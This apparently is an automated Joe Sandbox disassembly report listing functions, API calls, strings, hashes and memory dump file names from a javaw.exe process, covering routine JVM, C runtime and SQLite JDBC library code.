Instruction ID: 2f5481c84f8dd023bb8b5bc9d28789c8fc672106d16521fb6bfbcf49d89124a2
Opcode Fuzzy Hash: 166a4c1ca45d9a6fc330e46db587ee59e7946d4a9d688767c8cfbc134bfcf1fd
Instruction Fuzzy Hash: 48F0C73650026CBFCF2A2F96EC08E993F75FF087A1F055114FA19B5131C6328824EB91

Function 6D5CB280 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6D51E3D9,00000000,00000000), ref: 6D5CB28C

Strings

ExceptionMark constructor expects no pending exceptions, xrefs: 6D5CB2BA
C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\utilities\exceptions.cpp, xrefs: 6D5CB2C9
fatal error, xrefs: 6D5CB2BF

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\utilities\exceptions.cpp$ExceptionMark constructor expects no pending exceptions$fatal error
API String ID: 3702945584-4093746859
Opcode ID: 72f9e1168d943354b5df0b318c4d43221448330729ed206492e31ac1a98e616d
Instruction ID: 9083a43c18362a1d7642aaf23f70388bbad5876f9f03b3235f25206584f8d0f6
Opcode Fuzzy Hash: 72f9e1168d943354b5df0b318c4d43221448330729ed206492e31ac1a98e616d
Instruction Fuzzy Hash: 81F0A070200314AFD708DF94D908F56FBA1AF14366F06846AE60C9B713D775D410CBD6

Function 6FB0A266 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 322COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 6FB0A300
qsort.MSVCRT ref: 6FB0A372

Strings

e, xrefs: 6FB0A6B7

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: memcmpqsort
String ID: e
API String ID: 1641062633-4024072794
Opcode ID: 340623842772c8cc7c3ea00c0b07006bbbe5e44f685281b401505846820dea73
Instruction ID: f7d5795c5f8ee88b27607b2942cc92c63bacd48c11e610a408788904825f53b5
Opcode Fuzzy Hash: 340623842772c8cc7c3ea00c0b07006bbbe5e44f685281b401505846820dea73
Instruction Fuzzy Hash: 33E1F5B5A04359CFDB04DFA8D58069EBBF5FF88314F15892AE854AB380D774A981CF81

Function 00E2221C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(00000000,00E1925F,00000000,?,?,?,?,?,?,00E2220A,00000000,?,00E1925F,?,00000000,?), ref: 00E22368
GetLastError.KERNEL32(?,?,?,?,?,00E2220A,00000000,?,00E1925F,?,00000000,?), ref: 00E22372

Strings

", xrefs: 00E2225D, 00E222A8, 00E222C5

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorFileLast
String ID: "
API String ID: 734332943-4070204114
Opcode ID: fe5993e0d8551afadde049814ba2f16380392b089fb6b88b1ecc18b913f30be7
Instruction ID: 72566a60a5b237caa11ba4bb8bd79038350fd328f4c47e34163dd62f0cdc4228
Opcode Fuzzy Hash: fe5993e0d8551afadde049814ba2f16380392b089fb6b88b1ecc18b913f30be7
Instruction Fuzzy Hash: E7513472900616BADB25CF69EC81BED7BB4BB04328F14221CF611B6191D3799990CBA0

Function 00E2149B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E1AD8A: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2120D,?,00000000,?,?,00E21232,?,00000007,?,?,00E21632,?,?), ref: 00E1ADA0
Part of subcall function 00E1AD8A: GetLastError.KERNEL32(?,?,00E2120D,?,00000000,?,?,00E21232,?,00000007,?,?,00E21632,?,?), ref: 00E1ADAB

___free_lconv_mon.LIBCMT ref: 00E214DF

Strings

@c, xrefs: 00E21587
ph, xrefs: 00E214B1

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorFreeHeapLast___free_lconv_mon
String ID: @c$ph
API String ID: 4068849827-3282706937
Opcode ID: e26d4dbce18f59004bf30ca446f0c80dc72db890de44baa9d2d89c017ad7c832
Instruction ID: 7c5e839d7075a8759e5ef4c5dabe3884cbe8c4650db216c4a83af9f807248ae5
Opcode Fuzzy Hash: e26d4dbce18f59004bf30ca446f0c80dc72db890de44baa9d2d89c017ad7c832
Instruction Fuzzy Hash: D23192715006109FDB21AB34F805BA673E5BF9031AF1565A9F05AF71A1DB71EEC0CB11

Function 00E0D3A6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00E0D3CB

Strings

RCC, xrefs: 00E0D3E5
MOC, xrefs: 00E0D3DD

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 2e3891ee7b1822767903b027fab4d413727691dc08e052668ca0f95f3d4a64fb
Instruction ID: 8a3e8372b035f7bce4bda6cff9314ba3db25ac122278fb1cf0b32d94945bf791
Opcode Fuzzy Hash: 2e3891ee7b1822767903b027fab4d413727691dc08e052668ca0f95f3d4a64fb
Instruction Fuzzy Hash: 30418D71900209AFCF15DFA8CC81AEE7BB5FF48308F149169F924B72A2D335A990DB50

Function 6D529AB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000006), ref: 6D529B12

Strings

sun.nio.MaxDirectMemorySize, xrefs: 6D529D5F

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID: sun.nio.MaxDirectMemorySize
API String ID: 3702945584-2267436533
Opcode ID: 2e7c05d73db9a88562d813573139f8781381103f4d2784dd5ea3418e6c773349
Instruction ID: 76d0969a9303a3c66e41e647e42f3141f0f735c66f8d48c9fa9168543b85c512
Opcode Fuzzy Hash: 2e7c05d73db9a88562d813573139f8781381103f4d2784dd5ea3418e6c773349
Instruction Fuzzy Hash: 8741357490031ADFCB68CF18C981BD9B7B5BF49314F1084A9E959A7791D730AA84CF91

Function 6D4E9D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

jio_snprintf.JVM(?,00000014,/0x%08x,00000000,?,?,?,?,?,?,6D59EEA1,0000084E,00000000,?), ref: 6D4E9D66

Strings

/0x%08x, xrefs: 6D4E9D5B
<unknown>, xrefs: 6D4E9DD7

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: jio_snprintf
String ID: /0x%08x$<unknown>
API String ID: 2242708088-4230375195
Opcode ID: 58293e23de510528f344a304b0aadebe91614eca1e6c0dbcca35fc3316f5c8aa
Instruction ID: d16ec0cefedd45cfe0283644a86b3fd3ee31b0f1c59195fc1824901f82d755c4
Opcode Fuzzy Hash: 58293e23de510528f344a304b0aadebe91614eca1e6c0dbcca35fc3316f5c8aa
Instruction Fuzzy Hash: EB21293060810A6ECB04CF68C851EBDF369EF49208F04429DD90987782EF62A906C391

Function 00E064E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 00E06519
_strpbrk.LIBCMT ref: 00E06533

Strings

.-_, xrefs: 00E06513, 00E0652D

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strpbrk
String ID: .-_
API String ID: 3221230779-376218738
Opcode ID: 07876ccdb8796a46b7ae4ffe9e9c901e150202a95942a7641899a266cc5ffdc9
Instruction ID: 17a65ad20aeab2af2229fd311c4fd7fc40f2aa97540972680d9bea5ba2848c59
Opcode Fuzzy Hash: 07876ccdb8796a46b7ae4ffe9e9c901e150202a95942a7641899a266cc5ffdc9
Instruction Fuzzy Hash: AB1178334083254BC7259E54BC01B5B7BE5EF81738F18262EFC447A2C5DE21895482D5

Function 00E06593 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00E065A0
_strlen.LIBCMT ref: 00E065CD

Strings

_JAVA_VERSION_SET=, xrefs: 00E06595

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen
String ID: _JAVA_VERSION_SET=
API String ID: 4218353326-346614633
Opcode ID: 518e52d606676f5d38cd4c1242c390faca75994db2f46a192db4dd1ae2a6c1aa
Instruction ID: 78a8978be0a6dd1abf379f2230b638a16f4161d319f02d516d1fc6999a9c67d9
Opcode Fuzzy Hash: 518e52d606676f5d38cd4c1242c390faca75994db2f46a192db4dd1ae2a6c1aa
Instruction Fuzzy Hash: 2901263310A62656E72967A4BC017AB13DD8F02778F2C2429FA05BE1C6DF02E8D241A8

Function 6D412B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(?,0000002F,?,?,00000000,?,6D41365A,?,?,?), ref: 6D412B4C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,META-INF,00000000,?), ref: 6D412B99

Strings

META-INF, xrefs: 6D412B93

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: strncmpstrrchr
String ID: META-INF
API String ID: 2586757393-4015205905
Opcode ID: 7297dec31fac41696a93eb97e2354b937088483925aed1406cf154223e04b21b
Instruction ID: 05e7ec6d37bab3de3bb46322622d41c05a54af8239516bca9ef70024884fa89d
Opcode Fuzzy Hash: 7297dec31fac41696a93eb97e2354b937088483925aed1406cf154223e04b21b
Instruction Fuzzy Hash: 9701DB723086066ED7108E5AECC0F65F799EB95265B10813BEA48C7701DAA2D81983E4

Function 00E0967C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E09687
___raise_securityfailure.LIBCMT ref: 00E09744

Strings

`!, xrefs: 00E0967C

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: `!
API String ID: 3761405300-867017424
Opcode ID: ffadfc662cc561a59c022a85575bf069b68369a33cbffeb6ff027a8cedde26d7
Instruction ID: 8af4dabb9069556295b4bef212c539f6ff138df8aac43d510c3316fc9f5209b0
Opcode Fuzzy Hash: ffadfc662cc561a59c022a85575bf069b68369a33cbffeb6ff027a8cedde26d7
Instruction Fuzzy Hash: 49119FB8610209EFD700EF27F949A407FB4BF48304B80E06AE819AB3A1E7B195498B55

Function 6FA71FD5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 6FA72039

Strings

src/main/java/org/sqlite/core/NativeDB.c, xrefs: 6FA7202A
*func, xrefs: 6FA72032

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: _assert
String ID: *func$src/main/java/org/sqlite/core/NativeDB.c
API String ID: 1222420520-2436765891
Opcode ID: 63f65468984d8b93bce422001708760fc7d0dca866e8711e6378284e89e09c57
Instruction ID: b925426ad755f2d833f94f590abb929382f5f31081594b410f24d8af3e6b9a59
Opcode Fuzzy Hash: 63f65468984d8b93bce422001708760fc7d0dca866e8711e6378284e89e09c57
Instruction Fuzzy Hash: 380125B49087049FCB14EF69D18579EBBF4FF49354F00845DE5888B344DB359985CB82

Function 6FA71F49 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 6FA71FAD

Strings

src/main/java/org/sqlite/core/NativeDB.c, xrefs: 6FA71F9E
*func, xrefs: 6FA71FA6

Memory Dump Source

Source File: 00000010.00000002.3209036591.000000006FA71000.00000020.00000001.01000000.00000017.sdmp, Offset: 6FA70000, based on PE: true

Associated: 00000010.00000002.3209010161.000000006FA70000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209113880.000000006FB26000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209139949.000000006FB29000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209165683.000000006FB3E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209188887.000000006FB3F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209217085.000000006FB40000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000010.00000002.3209241179.000000006FB43000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa70000_javaw.jbxd

Similarity

API ID: _assert
String ID: *func$src/main/java/org/sqlite/core/NativeDB.c
API String ID: 1222420520-2436765891
Opcode ID: 2c1e400f94712717abe64655f5d6854b6c57701457a453c89138ceffaa0f32fa
Instruction ID: 43b231f435d3d32598abbaea62c05af088c2f4e62bfb7076aecf67063f0d0078
Opcode Fuzzy Hash: 2c1e400f94712717abe64655f5d6854b6c57701457a453c89138ceffaa0f32fa
Instruction Fuzzy Hash: 7B0102B85087089FCB10AF68C184A9EBBF0FF49354F00885DE9884B344D734A985CB82

Function 00E05A5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32 ref: 00E05A73
RegQueryValueExA.ADVAPI32 ref: 00E05A9A

Strings

Software\JavaSoft\Java Runtime Environment, xrefs: 00E05A5B

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: QueryValue
String ID: Software\JavaSoft\Java Runtime Environment
API String ID: 3660427363-786720643
Opcode ID: 13512725e527b09109cf5d1aa444d0ab780c63d398d155b986aaea333c57397c
Instruction ID: e4f2c602fe8efdc361b8da2cf4777bf380a3d487d63f7eefc817df9f6e8335b8
Opcode Fuzzy Hash: 13512725e527b09109cf5d1aa444d0ab780c63d398d155b986aaea333c57397c
Instruction Fuzzy Hash: E9F03A7650010DFFDF208F92DC89CEF3BBDEB86700B105258F805A2050D3319A9AEB20

Function 6D5EAE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(6D5CEF83,?,6D5CEF83,?,00000020,00000000,00000000), ref: 6D5EAE88
jio_snprintf.JVM(00000000,?,%d-%02d-%02d %02d:%02d:%02d,?,?,?,?,?,?), ref: 6D5EAEB5

Strings

%d-%02d-%02d %02d:%02d:%02d, xrefs: 6D5EAEAC

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
